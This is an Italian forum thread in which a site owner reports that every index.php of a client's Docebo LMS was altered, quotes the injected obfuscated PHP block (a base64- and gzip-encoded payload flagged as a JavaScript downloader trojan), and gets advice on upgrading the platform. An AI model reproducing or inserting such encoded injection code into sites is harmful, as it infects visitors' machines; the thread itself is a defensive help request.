Files index.php modificati

[coniglio]

Buongiorno a tutti,
tre giorni fa nell'installazione docebo di un mio cliente c'è stato un problema.

Tutti i file index sono stati modificati ed è stato inserito il seguente codice:

Code: Select all

#c3284d#
echo(gzinflate(base64_decode("hVTJkpswEP2WcBjAGA0Sw5JolBxc+YIcKR9sLBtqbMASjmtwzb9HK2DXJDlINL28ft1S65WXrO767z17v53Jri0vJ9r0oGR009OfRyr/POfi+PgMNl1Hm92qqo877xw4QvdRbvqy8s5X/1aRMILoOcHDQNyNG7hHF++Ju2dCbMU6ibWqhC4QZrZy8YdMuaWHLSUda/u2f++oBdy+xIcd928Sa/jtAn7Z8p55EMUhRMgPhgFzToq1RPOqp6dh8H+47Y663xwHX0lf1RxTci32YySUQWvckCKMQZwlS/ERewaSZQ5yJUntV5AiqZF7ZmSlTpaRFnK1KwNE2qIdo2UYKRUC1pgB65yp/zluCIUlnuxSRNqiMuUKWi2hl/gqdWQIPO6GnWZs4uaJJ0nVOoboxLoFmp7NEGe2Olun1ulMkp9hKioxqI81zutJgKWazwCtp+I6wulE2dQey8+uh0rmeSzd1OTQoSP0v44km1IZjzt6d6cDsk+gbavt6efW856gLu7ucn3WhXx0mqEp7zkcfOjc1OHMdDj/mz/Smz3y/99ZFWBuub3rZpbGkRIz2TKvJmmIQigXrkOYpl9IhOsg8G9vpJazy3nwq2d1cyicPWtPTuCsKvEsiBl21l4IFy+LauElAVw0xdvaFy8N9TgXn9dn82D9AQ==")));
#/c3284d#

gli utenti windows, si vedevano bloccare l'accesso e vedevano la segnalazione di un virus nella pagina.

URL: http://fad.XXXXXXXXXX.it/index.php
Processo: C:\Programmi\Internet Explorer\iexplore....
Infezione: JS:Downloader-BNY [Trj]

Ho chiaramente controllato tutti i file e cancellato le tracce del problema. Dopo la pulizia manuale è tornato tutto normale ed anche la segnalazione di infezione è scomparsa.

Ora però vorrei mettere in sicurezza l'installazione, come mi consigliate di procedere?

la versione è la 3.6.0.2

Grazie mille
Paolo

[alberto]

Ciao, ti consiglio di aggiornare almeno alla 3605, che se non sbaglio tra le altre cose chiudeva anche qualche bug di siccurezza, non so se già presente nella tua versione. Se puoi aggiorna anche alla 405 in modo da allinearti ai fix rilasciati dalla community.
Trovi i pacchetti di installazione qui: http://sourceforge.net/projects/doceboreborn/

In bocca al lupo!

[coniglio]

Grazie mille delle informazioni.

Cercherò, parlandone con il cliente, di portare la piattaforma alla 405.

facendo l'aggiornamento, mi crea problemi sul template grafici?
I settaggi dei corsi, modalità di iscrizione, archivi ecc... subiranno dei cambiamenti?

Grazie mille ancora
Paolo

[alberto]

I template della 3.6 NON sono compatibili con la 4, ma la gestione template nella versione 4 è stata molto migliorata e semplificata: ora usa un unico template per LMS e Core, molti fogli di stile sono stati accorpati, è possibile assegnare template diversi a nodi diversi dell'organigramma utenti, l'aspetto in generale è molto più moderno e "corporate".
Se non hai aggiunto modifiche funzionali sul template dovresti riuscire ad adeguarlo senza problemi con poco CSS.

Per quanto riguarda settaggi dei corsi e iscrizioni degli utenti negli upgrade che ho fatto finora non ho ancora riscontrato problemi.

In questi giorni abbiamo riscontrato un problemino con la gestione dei permessi degli amministratori pubblici e lo stiamo verificando, per il resto ad oggi sembra tutto ok.

[coniglio]

Perfetto, grazie mille delle informazioni.